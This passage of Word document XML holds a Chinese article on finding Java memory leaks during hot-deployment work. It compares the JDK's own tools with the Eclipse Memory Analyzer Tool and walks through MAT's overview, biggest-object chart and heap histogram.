        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006434DD" w:rsidRDefault="006434DD" w:rsidP="006434DD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006434DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>最近一段时间一直在研究热部署，热部署中涉及到一个比较头痛的问题就是查内存泄露（</w:t>
      </w:r>
      <w:r w:rsidRPr="006434DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Memory Leak</w:t>
      </w:r>
      <w:r w:rsidRPr="006434DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>），于是乎在研究热部署的过程中，干的最多的一件事就是查内存泄露。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006434DD" w:rsidRDefault="006434DD" w:rsidP="006434DD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006434DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>查内存泄露，最开始尝试用</w:t>
      </w:r>
      <w:r w:rsidRPr="006434DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JDK</w:t>
      </w:r>
      <w:r w:rsidRPr="006434DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>自身的工具去解决这件事，通过</w:t>
      </w:r>
      <w:r w:rsidRPr="006434DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jstat</w:t>
      </w:r>
      <w:r w:rsidRPr="006434DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="006434DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jmap</w:t>
      </w:r>
      <w:r w:rsidRPr="006434DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，去发现是否有内存泄露，当判断有内存泄露存在时，试图要去寻找内存泄露的点时，发现单纯使用</w:t>
      </w:r>
      <w:r w:rsidRPr="006434DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JDK</w:t>
      </w:r>
      <w:r w:rsidRPr="006434DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>自身提供的工具没有什么很好的办法，我尝试过</w:t>
      </w:r>
      <w:r w:rsidRPr="006434DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Jhat</w:t>
      </w:r>
      <w:r w:rsidRPr="006434DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，发现查起来太困难了，后来对比网上推荐的工具，我选择了</w:t>
      </w:r>
      <w:r w:rsidRPr="006434DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MAT</w:t>
      </w:r>
      <w:r w:rsidRPr="006434DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="006434DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Memory Analyzer Tool</w:t>
      </w:r>
      <w:r w:rsidRPr="006434DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006434DD" w:rsidRDefault="006434DD" w:rsidP="006434DD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006434DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MAT</w:t>
      </w:r>
      <w:r w:rsidRPr="006434DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是一个</w:t>
      </w:r>
      <w:r w:rsidRPr="006434DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>eclipse</w:t>
      </w:r>
      <w:r w:rsidRPr="006434DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的插件，上手起来比较快。</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24D69">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>它能够快速的分析</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24D69">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>dump</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24D69">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>文件，可以直观的看到各个对象在内存占用的量大小，以及类实例的数量，对象之间的引用关系，</w:t>
      </w:r>
      <w:r w:rsidRPr="006434DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>找出对象的</w:t>
      </w:r>
      <w:r w:rsidRPr="006434DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>GC Roots</w:t>
      </w:r>
      <w:r w:rsidRPr="006434DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>相关的信息，此外还能生成内存泄露报表，疑似泄露大对象的报表等等</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D6E5F" w:rsidRDefault="006434DD" w:rsidP="006434DD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D30A31" w:rsidRPr="00D30A31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>生产环境中，尤其是吃大内存的</w:t>
      </w:r>
      <w:r w:rsidR="00D30A31" w:rsidRPr="00D30A31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidR="00D30A31" w:rsidRPr="00D30A31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，一旦出现内存泄露等问题是非常容易引发</w:t>
      </w:r>
      <w:r w:rsidR="00D30A31" w:rsidRPr="00D30A31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>OutofMemory</w:t>
      </w:r>
      <w:r w:rsidR="00D30A31" w:rsidRPr="00D30A31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的，如果没有一个好的工具提供给开发人员定位问题和分析问题，那么这将会是一场</w:t>
      </w:r>
      <w:r w:rsidR="00D30A31" w:rsidRPr="00D30A31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D30A31" w:rsidRPr="00D30A31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>噩梦。目前</w:t>
      </w:r>
      <w:r w:rsidR="00D30A31" w:rsidRPr="00D30A31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JDK</w:t>
      </w:r>
      <w:r w:rsidR="00D30A31" w:rsidRPr="00D30A31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>其实自带有一些内存泄露分析工具专门用于帮助开发人员定位内存泄露等问题，但是这些工具往往并不是能够满足一些现状，这里笔者所指的现状更多是迅速、便捷、高效的定位出问题，方便开发人员迅速进行调整。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B629A" w:rsidRDefault="002B629A" w:rsidP="002B629A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5271554" cy="2004365"/>
            <wp:effectExtent l="19050" t="0" r="5296" b="0"/>
            <wp:docPr id="27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3" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2005413"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B629A" w:rsidRDefault="002B629A" w:rsidP="00634851">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">MAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可以打开一个已有的堆快照，也可以通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>直接从活动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JAVA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>进程程序中导出堆快照。右侧界面中，显示了</w:t>
      </w:r>
      <w:r w:rsidRPr="002B629A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>堆快照文件的大小、类、实例和</w:t>
      </w:r>
      <w:r w:rsidRPr="002B629A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ClassLoader</w:t>
      </w:r>
      <w:r w:rsidRPr="002B629A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的总数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5271893" cy="2406701"/>
            <wp:effectExtent l="19050" t="0" r="4957" b="0"/>
            <wp:docPr id="27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4" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2407804"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00301FC8" w:rsidRDefault="00301FC8" w:rsidP="00301FC8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>右侧的饼图显示当前快照中</w:t>
      </w:r>
      <w:r w:rsidRPr="00301FC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>最大的对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。单击工具栏上的柱状图，可以查看当前堆的类信息，包括类的对象数量、浅堆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(Shallow heap)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、深堆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(Retained Heap)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00301FC8" w:rsidP="00634851">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5273063" cy="2355494"/>
            <wp:effectExtent l="19050" t="0" r="3787" b="0"/>
            <wp:docPr id="27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5" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2356051"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00301FC8" w:rsidRDefault="007271C1" w:rsidP="00634851">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
